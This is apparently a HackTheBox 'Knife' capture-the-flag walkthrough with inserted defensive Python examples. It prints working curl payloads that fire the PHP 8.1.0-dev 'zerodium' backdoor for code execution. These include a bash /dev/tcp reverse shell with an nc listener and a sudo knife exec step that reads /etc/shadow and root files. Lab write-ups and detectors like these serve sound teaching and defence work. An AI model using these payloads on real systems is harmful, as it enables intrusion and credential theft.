HackTheBox Active Machine Walkthrough - Knife 🗡️

😍A knife is only as good as the one who wields it Hocho Knife #Easy #Linux Machine created by MrKN16H went live 22 May 2021 at 19:00:00 UTC.

😜Let's Start the journey.....

🔐Enumeration🔰

💉From the Dmitry result one thing caught my eye: it is an Apache httpd server instead of the nginx we usually see on HackTheBox machines.


🔰We can find 2 open ports. On port 80 we can see a web page.

🔧As the latest release of Apache httpd is 2.4.46, there could be a known vulnerability in 2.4.41, so I looked for it on the web.

🗽Looking for it I stumbled upon this Rapid7 post: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2020-1934/.

🔰But there is one concern about this exploit: you need to have the mod_proxy_ftp module running and an FTP backend, which we know nothing of.

🖥️Web-Visiting🛡️

🤔We can find this static page and nothing interesting in it.

🔐Looking at the source code I found pen.js, which looked interesting, but after going through it I got nothing of interest.
I also added knife.htb to /etc/hosts to look for sub-domains, but interestingly we found the default nginx page.

😜This was interesting.
But let's go back to the main page.
Looking for vulnerabilities I found one interesting thing: PHP 8.1.x-dev was backdoored by some hackers.


😏You can find articles on it:
https://techbeacon.com/security/php-backdoored-git-hack-its-no-joke-so-don't-be-fool
https://www.welivesecurity.com/2021/03/30/backdoor-php-source-code-git-server-breach/
This is interesting, as the server is leaking the version of PHP.

☢️Wappalyzer detected it.
Looking through a bunch of articles I finally came to this one, which shows how to exploit the backdoor planted by those troll hackers:
https://blog.csdn.net/zy15667076526/article/details/116447864

💉The website is originally in Chinese, but Google Translate works fine.
So let's see whether the PHP on the box is the dev version or not.


$ curl -i http://10.10.10.241

🔐Looking at the X-Powered-By header we can say that we are indeed in luck: the version is PHP/8.1.0-dev.

💉Exploitation☢️

😏Reading through the article I found out that the backdoor is triggered through a User-Agent style header and executes the code passed in it.
The header value has to start with the string zerodium, which is also the name of a leading zero-day acquisition firm.

🤔So let's try PoC for this exploit.


$ curl -i -s -k -H 'User-Agentt: zerodiumvar_dump(2*3);' http://10.10.10.242/

💉Looks like we triggered the RCE; let's get going and try to execute system commands.

$ curl -i -s -k -H 'User-Agentt: zerodiumsystem("id");' http://10.10.10.242/

🔐Looks like the web server is running as james, so that is one less step for us.
Let's get the reverse shell.

$ curl -i -s -k -H $'User-Agentt: zerodiumsystem("bash -c \'bash -i >& /dev/tcp/ip/port 0>&1\'");' http://10.10.10.242

🔐And boom we have the shell😜

$ nc -nvlp 4242

listening on [any] 4242 ...
connect to [] from (UNKNOWN) [10.10.10.242] 60452
bash: cannot set terminal process group (966): Inappropriate ioctl for device
bash: no job control in this shell
id
id
uid=1000(james) gid=1000(james) groups=1000(james)
james@knife:/$ 
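For the blue-team side of the two findings above (the response leaking PHP/8.1.0-dev in X-Powered-By, and the backdoor being triggered by a misspelled User-Agentt header whose value starts with zerodium), here is an added example of a small WAF-style inspector. It is not part of the original walkthrough; the sample request and response bytes are constructed for the demonstration, and the header names and prefix come straight from the post.

```python
"""Added example: flag the PHP 8.1.0-dev backdoor trigger on inbound requests
and the version disclosure on outbound responses. Not code from the post."""
from __future__ import annotations

import re
from typing import Dict, List, Tuple

# Trigger described in the post: a header literally named 'User-Agentt'
# (note the extra 't') whose value begins with 'zerodium'; the remainder is
# executed as PHP by the backdoored build.
TRIGGER_HEADER = "user-agentt"
TRIGGER_PREFIX = "zerodium"

# Version string the backdoored build advertises in X-Powered-By.
LEAKED_VERSION = re.compile(r"PHP/8\.1\.0-dev", re.IGNORECASE)


def parse_headers(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP message into its start line and a lower-cased header map."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw: bytes) -> List[str]:
    """Return findings for one inbound request; an empty list means clean."""
    start, headers = parse_headers(raw)
    findings: List[str] = []
    value = headers.get(TRIGGER_HEADER)
    if value is not None:
        if value.lower().startswith(TRIGGER_PREFIX):
            findings.append(f"php-dev backdoor trigger: {start!r} User-Agentt={value!r}")
        else:
            # The misspelled header on its own is unusual enough to log.
            findings.append(f"suspicious header User-Agentt (no trigger prefix): {start!r}")
    return findings


def inspect_response(raw: bytes) -> List[str]:
    """Flag a response whose X-Powered-By advertises the backdoored dev build."""
    _, headers = parse_headers(raw)
    powered = headers.get("x-powered-by", "")
    if LEAKED_VERSION.search(powered):
        return [f"server advertises backdoored build: X-Powered-By={powered!r}"]
    if powered:
        return [f"version disclosure: X-Powered-By={powered!r}"]
    return []


# Constructed sample traffic (not captured from the box).
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agentt: zerodiumvar_dump(2*3);\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agentt: curl/7.68.0\r\n\r\n",
]
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n<html>"
)


def scan_samples() -> Tuple[List[List[str]], List[str]]:
    """Run both inspectors over the constructed samples."""
    return [inspect_request(r) for r in SAMPLE_REQUESTS], inspect_response(SAMPLE_RESPONSE)


if __name__ == "__main__":
    request_findings, response_findings = scan_samples()
    for raw, findings in zip(SAMPLE_REQUESTS, request_findings):
        print(raw.split(b"\r\n")[0].decode(), "->", findings or "clean")
    print("response ->", response_findings or "clean")
```

The mitigation on the server side is simply not to run a dev build of PHP and to turn off `expose_php` so the X-Powered-By header is not sent; the request-side rule is what you would feed a WAF or IDS to catch attempts against hosts you have not yet fixed.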

🔰User Privilege 😜

1 - Go to the home directory ~ cd home
2 - Then go to the james directory ~ cd james
3 - Cat user.txt ~ ls ~ cat user.txt

🔐Root Access😜

🔰Now that we have a stable shell, let's enumerate for PrivEsc.

☢️Enumeration

james@knife:~$ cat ex.rb 
puts File.read('/etc/shadow')

😏Looking into the user's home directory we can see an interesting Ruby file which can read /etc/shadow, but the catch is we don't have Ruby on the box, or at least not on the desired path and with the desired name.

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

🛡️Analysing the file /usr/bin/knife:

james@knife:~$ file /usr/bin/knife 
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife

🔐It's a symbolic link to another file, /opt/chef-workstation/bin/knife.
Looking at the directory /opt/chef-workstation we can see it is a Ruby installation.

james@knife:~$ ls /opt/chef-workstation/
bin  components  embedded  gem-version-manifest.json  gitbin  LICENSE  LICENSES  version-manifest.json  version-manifest.txt

☢️So basically on this box Ruby code can be run as root using /usr/bin/knife.
Running /usr/bin/knife we get the big help menu.
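The root cause here is a sudoers rule that hands root to a program which will happily evaluate a script for you. As an added example (not from the post), the script below audits `sudo -l` output for that pattern: it parses each permission line, follows symlinks so that `/usr/bin/knife` is seen as the Chef workstation binary it really is, and flags commands that run interpreters or scripts. The `sudo -l` text and the symlink map are constructed to mirror what the post shows, so the example runs offline; `audit_sudo_l` defaults to `os.path.realpath` for use on a real host.

```python
"""Added example: audit `sudo -l` output for rules that are equivalent to
passwordless root because the allowed command evaluates arbitrary code.
Not code from the original walkthrough."""
from __future__ import annotations

import os
import re
from typing import Callable, List

# Programs that execute code or scripts handed to them. `knife exec <file>`
# evaluates a Ruby script (that is the path used in the post), so the Chef
# CLI belongs with the interpreters. Extend this for your environment.
CODE_RUNNERS = {"knife", "ruby", "python", "python3", "perl", "bash", "sh", "gem"}

# One permission line of `sudo -l` output, e.g.
#   (root) NOPASSWD: /usr/bin/knife
#   (ALL : ALL) ALL
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(output: str, resolve: Callable[[str], str] = os.path.realpath) -> List[str]:
    """Return one finding string per risky rule found in `sudo -l` output."""
    findings: List[str] = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # "Matching Defaults", "User ... may run", env lines
        runas = m.group("runas").split(":")[0].strip()
        tags = {t for t in m.group("tags").replace(":", " ").split()}
        nopass = "NOPASSWD" in tags
        for cmd in m.group("cmds").split(","):
            parts = cmd.strip().split()
            if not parts:
                continue
            path = parts[0]
            if path == "ALL":
                findings.append(f"{runas}: ALL commands{' without password' if nopass else ''}")
                continue
            target = resolve(path)  # follow symlinks to the real binary
            if os.path.basename(target) in CODE_RUNNERS:
                via = f" -> {target}" if target != path else ""
                findings.append(
                    f"{runas}{' NOPASSWD' if nopass else ''}: {path}{via} runs arbitrary code"
                )
    return findings


# Constructed sample mirroring the output shown in the post.
SAMPLE_SUDO_L = """Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl restart apache2
"""

# Constructed symlink map standing in for the filesystem (assumption for the demo).
FAKE_LINKS = {"/usr/bin/knife": "/opt/chef-workstation/bin/knife"}


def fake_resolve(path: str) -> str:
    """Offline stand-in for os.path.realpath using the constructed link map."""
    return FAKE_LINKS.get(path, path)


def audit_sample() -> List[str]:
    """Audit the constructed sample with the offline resolver."""
    return audit_sudo_l(SAMPLE_SUDO_L, fake_resolve)


if __name__ == "__main__":
    for finding in audit_sample():
        print("RISK:", finding)
```

On a real host run it as `audit_sudo_l(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)` for the current user; the fix for a hit like the knife rule is to drop the rule or restrict it to a wrapper that does not accept a script argument.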

james@knife:~$ sudo /usr/bin/knife

cd /tmp
echo 'puts File.read("/root/root.txt")' > rev.rb

😏Now let's run our ex.rb script

james@knife:~$ sudo /usr/bin/knife exec ex.rb


!!!!!!Rooted!!!!!



Comments

  1. Sir, I have a doubt: while getting the reverse shell, as we are able to run commands we can get a reverse shell by running the payload, but why did you run the bash -c payload?